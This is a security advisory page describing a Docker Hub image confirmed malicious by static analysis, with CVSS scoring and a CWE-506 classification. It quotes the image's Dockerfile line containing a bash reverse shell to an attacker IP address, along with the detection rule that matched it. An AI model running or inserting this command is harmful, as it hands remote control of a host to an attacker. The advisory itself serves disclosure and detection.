VDB

GCVE-110-OSM-2026-7595

GCVE-110-OSM-2026-7595
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published July 10, 2026
This Docker Hub image was confirmed malicious by static analysis. The image opens a reverse shell, making any host that runs it dial back to an attacker-controlled server and hand over a command prompt. Knorr inspected the image configuration and unpacked its layers. The image was read but never executed. The detection rule, the attacker infrastructure, and the exact location of the malicious code appear in the payload details so the finding can be verified independently. Location of the malicious code: image ENTRYPOINT / CMD / build history. Detection rule bash-tcp matched on this line: "RUN bash -c "/bin/bash -i >&/dev/tcp/8.130.14.82/80 0>&1"".

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownDockerfile (affected)

Browse GCVE Records

73,040 records in the GCVE database · Updated July 15, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›